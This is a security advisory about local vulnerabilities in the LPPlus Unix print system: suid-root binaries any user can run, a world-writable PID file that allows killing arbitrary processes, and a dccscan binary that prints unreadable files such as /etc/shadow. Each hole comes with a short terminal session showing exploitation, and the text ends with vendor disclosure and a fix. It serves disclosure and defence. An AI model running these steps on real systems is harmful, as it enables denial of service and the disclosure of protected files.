COMMAND

    LPPlus

SYSTEMS AFFECTED

    LPPlus 3.3.0, 3.2.1 (only tested)

PROBLEM

    Dixie  Flatline  found  following.   LPPlus  is Plus Technologies'
    print management  system for  unix.   It contains  several serious
    security  holes,  some  of  which  undermine  the integrity of the
    printing subsystem,  some of  which threaten  the security  of the
    system on which the product is installed.

    Hole #1:
    ========
    Of the 74  binaries that the  installer put on  Solaris system, 26
    were installed suid to root  and world-executable.  On linux  box,
    it was 26 out  of 64.  Several  of these should not  be suid-root,
    or should be group-executable only, and carefully restricted.

    For example, the following binaries are installed mode 4755 by the
    installer:

        $LPHOME/bin/dccsched
        $LPHOME/bin/dcclpdser
        $LPHOME/bin/dccbkst
        $LPHOME/bin/dccshut
        $LPHOME/bin/dcclpdshut
        $LPHOME/bin/dccbkstshut

    The first three start the scheduler, LPD server and network status
    daemons, respectively.   The next  three stop  the  aforementioned
    services.  In the default  configuration, all six can be  executed
    by  any  unprivileged  user,  effectively  giving  any user on the
    system  the  ability  to  start  and  stop  printing services.  No
    checking  of  userid,  group  or  anything  else  is done prior to
    execution.

        $ id
        uid=600(test) gid=300(users)
        $ ps -ef|grep dcc
            test 26357 26351  0 18:18:06 pts/0    0:00 grep dcc
            root 26262     1  0 17:41:50 ?        0:01 /opt/lpplus/bin/dccsched
            root 26272     1  0 17:42:03 ?        0:00 /opt/lpplus/bin/dcclpdser
            root 26276     1  0 17:42:14 ?        0:00 /opt/lpplus/bin/dccbkst
        $ dccbkstshut
        $ dcclpdshut
        LPD048E Signal sent to dcclpdser to shut down.
        $ dccshut
        LPP054I LP Plus scheduler ordered to shutdown.
        $ ps -ef|grep dcc
            test 26253 26239  0 17:39:45 pts/0    0:00 grep dcc
        $


    Hole #2:
    ========
    $LPHOME/system/lpdprocess is created mode 777.

    This file contains the process  ID of the dcclpdser process.   The
    combination  of  this  file's   permissions  and  the  fact   that
    dcclpdshut is executable by  any user allows an  unprivileged user
    to send  signal 2  (SIGINT) to  any process  on the  system.   All
    that's required is for an unprivileged user to replace the PID  in
    $LPHOME/system/lpdprocess  with  the  PID  of their target process
    and then run $LPHOME/bin/dcclpdshut.

        $ id
        uid=600(test) gid=300(users)
        $ ps -ef|grep inet
            test 26285 26279  0 17:42:42 pts/0    0:00 grep inet
            root 12276     1  0   Aug 22 ?        0:00 /usr/sbin/inetd -s
        $ cat > $LPHOME/system/lpdprocess
        12276
        ^D
        $ dcclpdshut
        LPD048E Signal sent to dcclpdser to shut down.
        $ ps -ef|grep inet
            test 26291 26279  0 17:45:17 pts/0    0:00 grep inet
        $

    Hole #3:
    ========
    $LPHOME/bin/dccscan is suid-root and can be executed by any  user.
    It may allow an unprivileged user to print files to which he  does
    not  have  read  access.   The  ramifications  are fairly obvious:
    although  an  unprivileged  user  cannot  read  /etc/shadow   (for
    example), using this utility, he may be able to print it out.   In
    testing, this worked even when  sending to printers to which  user
    was  not  given  any  access  in the LPPlus security configuration
    (in fact, test user had no  access to ANY printers, or ANY  LPPlus
    services).

        # id
        uid=0(root) gid=1(other)
        # ls -alt /root/test
        total 6
        drwx------   2 root     other        512 Sep  5 17:46 .
        -r--------   1 root     other        365 Sep  5 17:46 foo
        drwx------   3 root     other        512 Sep  5 17:46 ..
        # su - test
        Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
        $ id
        uid=600(test) gid=300(users)
        $ ls -alt /root/test
        /root/test: Permission denied
        $ dccscan /root/test 30 5 "-dlp0"
        $
        
        # now, go to the printer and wait for the files to come out, or watch them
        # being queued as root, if you have access to dccstat

    Some other potential holes:
    * if the archive module is installed, $LPHOME/bin/dccasweep can be
      executed by any user.   This may undermine the integrity  of the
      archiving facility.
    * if the web interface is  installed, it utilizes a very old  beta
      version of apache, and the installation requires that the server
      (and all of  its children, which  run as nobody  out-of-the-box)
      run as root.
    * on the linux system, $LPHOME was created mode 777.  Root's umask
      was set to 022. This didn't  seem to be the case on  the Solaris
      system,  although  the  reason  for  this  may  be the different
      version of LPPLUS  rather than the  different unixes (see  below
      for version info).

SOLUTION

    At  this  time,  no  patches  or  updated  versions are available.
    However, most of  the utilities in  question either don't  need to
    be suid,  or can  be group-owned  by a  more restricted  group and
    mode 4750.

    The  vendor  was  notified   on  8/24/2000.   They  did   respond,
    confirming the existence of the holes.  However, a request for  an
    ETA on an updated release or patches has thus far been ignored.